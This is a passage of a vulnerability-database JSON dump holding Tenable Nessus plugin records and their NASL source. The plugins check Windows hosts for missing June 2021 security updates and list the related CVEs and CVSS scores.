script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003694: Windows 7 and Windows Server 2008 R2 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003694. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003694\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003667\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003694\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003694',\n '5003667'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003694, 5003667])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T14:27:20", "description": "The remote Windows host is missing security update 5003635. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003635: Windows 10 version 1909 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003635.NASL", "href": "https://www.tenable.com/plugins/nessus/150369", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150369);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31951\",\n \"CVE-2021-31952\",\n \"CVE-2021-31954\",\n \"CVE-2021-31955\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31969\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33739\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003635\");\n script_xref(name:\"MSFT\", value:\"MS21-5003635\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003635: Windows 10 version 1909 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003635. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003635\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003635\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003635'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build: '18363',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003635])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T14:27:53", "description": "The remote Windows host is missing security update 5003637. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003637: Windows 10 version 2004 / Windows 10 version 20H2 / Windows 10 version 21H1 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003637.NASL", "href": "https://www.tenable.com/plugins/nessus/150370", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150370);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31951\",\n \"CVE-2021-31952\",\n \"CVE-2021-31954\",\n \"CVE-2021-31955\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31960\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31969\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33739\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003637\");\n script_xref(name:\"MSFT\", value:\"MS21-5003637\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003637: Windows 10 version 2004 / Windows 10 version 20H2 / Windows 10 version 21H1 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003637. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003637\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003637\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003637'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'19041',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003637])\n\n|| smb_check_rollup(os:'10', \n sp:0,\n os_build:'19042',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003637])\n\n|| smb_check_rollup(os:'10', \n sp:0,\n os_build:'19043',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003637])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T14:28:25", "description": "The remote Windows host is missing security update 5003695. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003695: Windows Server 2008 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31962", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003695.NASL", "href": "https://www.tenable.com/plugins/nessus/150357", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150357);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31962\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003661\");\n script_xref(name:\"MSKB\", value:\"5003695\");\n script_xref(name:\"MSFT\", value:\"MS21-5003661\");\n script_xref(name:\"MSFT\", value:\"MS21-5003695\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003695: Windows Server 2008 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003695. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003695\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003661\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003695\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003695',\n '5003661'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003695, 5003661])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T14:28:24", "description": "The remote Windows host is missing security update 5003697. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003697: Windows Server 2012 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003697.NASL", "href": "https://www.tenable.com/plugins/nessus/150363", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150363);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003697\");\n script_xref(name:\"MSFT\", value:\"MS21-5003697\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003697: Windows Server 2012 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003697. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003697\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003697\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 